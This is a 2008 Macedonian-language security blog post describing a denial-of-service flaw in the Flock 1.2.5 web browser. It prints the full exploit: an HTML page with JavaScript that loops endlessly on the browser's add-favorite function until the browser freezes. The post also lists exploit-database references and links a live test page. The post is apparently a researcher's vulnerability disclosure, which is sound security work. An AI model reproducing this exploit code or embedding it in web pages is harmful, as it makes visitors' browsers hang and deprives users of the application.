IT.com.mk на Twitter IT.com.mk на Facebook IT.com.mk на Flickr IT.com.mk RSS канали
Почетна arrow Ѓоко Крстиќ arrow Сигурност arrow Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit
 
 
Компјутерска сигурност
Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи
RSS Канал  
Е-пошта  
Биографија  
 
 
Ѓоко Крстиќ
 
Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit Испечати Е-пошта
Автор: Ѓоко Крстиќ   
Објавено на: 09.09.2008
Социјалниот веб прелистувач Flock, (Mozilla) е ранлив на Denial of Service (DoS) напад, при кој апликацијата замрзнува (не реагира) и станува недостапна за легитимните корисници.
Со помош на специјален html код и JavaScript доаѓа до повторување (loop) на функција за импортирање на favorites, поточно сајтот http://www.zeroscience.org со наслов DoS.

Следува експлоатациски код:

---------------------------------------------------------код----------------------------------------------

<!----------------------------------------------0
||
| Flock Web Browser 1.2.5 Remote DoS Exploit|
| |
| by Gjoko 'LiquidWorm' Krstic|
| |
| http://www.zeroscience.org|
| |
| liquidworm [t00t] gmail.com|
| |
| 06.09.2008|
| |
0----------------------------------------------->

<html>

<title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</Title>

<head>

<br /><br />

<center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1>

<br /><h2><kbd>Freezed/Locked - Not Responding...</kbd></h2></center>

<body>

<script type="text/javaScript">

function Xploit()
{
title="DoS";
url="http://www.zeroscience.org";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}

else if( window.external )
{
window.external.AddFavorite( url, title);
}

else if(window.opera && window.print)
{
return (true);
}
}

for (n=0; n<n+1; n++)

Xploit();

</script>

<center>
<a href="http://www.zeroscience.org/codes/flock_dos.html">
<i>http://www.zeroscience.org/codes/flock_dos.html</i></a>
</center>

</body> </head> </html>

<!-- thanks to Gianni Amato -->

 ---------------------------------------------------------код----------------------------------------------


Референти:

- http://www.milw0rm.com/exploits/6391
- http://www.securityfocus.com/bid/31044
- http://www.packetstormsecurity.org/filedesc/flockweb-dos.txt.html
- http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6492
- http://governmentsecurity.org/forum/?showtopic=29966
- http://www.securityhome.eu/exploits/exploit.php?eid=166956535348c327e8326d16.07779197
- http://securityreason.com/exploitalert/4617
- http://heapoverflow.com
- http://www.buslab.org/index.php/content/view/256889/2/
- http://www.congoo.com/news/2008September7/Flock-Infinite-Loop-Multiple-Denial
- http://www.hacker.com.cn/news/view.asp?id=1775
- http://www.unix-cn.biz/sh/f14/flock-social-web-browser-1-2-a-12000.html
- http://en.securitylab.ru/poc/359028.php
- http://www.xp10.cc/xp10/t34825.html
- http://www.zeroscience.org/codes/flock_dos.txt

Тест: КЛИК (Со внимание!)


Клучни зборови:  Flock   Social   Web browser   DoS   Denial of Service   Exploit   Слабост   Експлоатација   JavaScript
 
Сподели:
Кајмакот
Digg
Technorati
Stumble
Reddit
YahooMyWeb
Delicious
Ma.gnolia
Facebook
Spurl
  
IT.com.mk форум

Последни написи на Ѓоко

Mozilla: Проверете ги вашите плагини
објавено на 21.10.2009 во Интернет
Во соработка со Adobe Product Security Incident Response Team (PSIRT)
објавено на 24.08.2009 во Сигурност
Збогување со milw0rm.com
објавено на 08.07.2009 во Интернет
Измами со кредитни картички
објавено на 07.06.2009 во Сигурност
Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност
  • ИТ факти
  • Настани
  • Мој ИТ

Google во Google

68.000.000 - просечна бројка на колку пати во еден месец корисниците од целиот свет на Google го пребарале зборот Google во 2008 година.
Нема настани во наредните денови.
Корисничко име

Лозинка



RSS канали на it.com.mk

Прашалник

Дали интернетoт е основно човеково право?

(187 глас/а)

  • 73.8%
  • 6.4%
  • 6.4%
  • 13.4%

Клучни зборови

yahoo nokia firefox веб 2 0 windows nvidia youtube amazon asus хардвер apple linkedin facebook adobe мрежи хакери маркетинг линукс блогови компјутери skype iphone ibm бизнис податоци gmail sony google paypal интервју блог bill gates софтвер microsoft sql друштвени мрежи warcraft програм blizzard комерц web2expo информатика ubuntu twitter linux заштита exploit cisco intel voip vista дизајн wikipedia интернет usb

Низ it.com.mk Блог Сервиси Маркетинг
Вести
Статии
Форум
Рецензии
Совети & трикови
Преземања
Настани
Барометар
Едуцентар
Препорачуваме
 Сите блогови
е-Бизнис 2.0
Uid=0
Хардверманија
Компјутерска сигурност
Apple
Линукс блог
 Веб-Соц Свет
Членство
Е-билтен
RSS канали
PDA верзија

Профили
Facebook профилTwitter профилIT.com.mk @ Flickr
IT.com.mk @ YouTubeLinkedIn профилFriendFeed профил
Каква музика слушаат ИТ луѓето?Препорачуваме линкови преку Delicious Главен RSS канал
 Заработете со Whost.mk
Поставете линк или банер до whost.mk и заработете од секоја продажба..
http://www.whost.mk/affiliates.aspx

Aironet.mk - Безжичен Интернет
Едноставно и квалитетно решение...

Zero Science Lab
Македоснска лабораторија за истражување и развој на информациска безбедност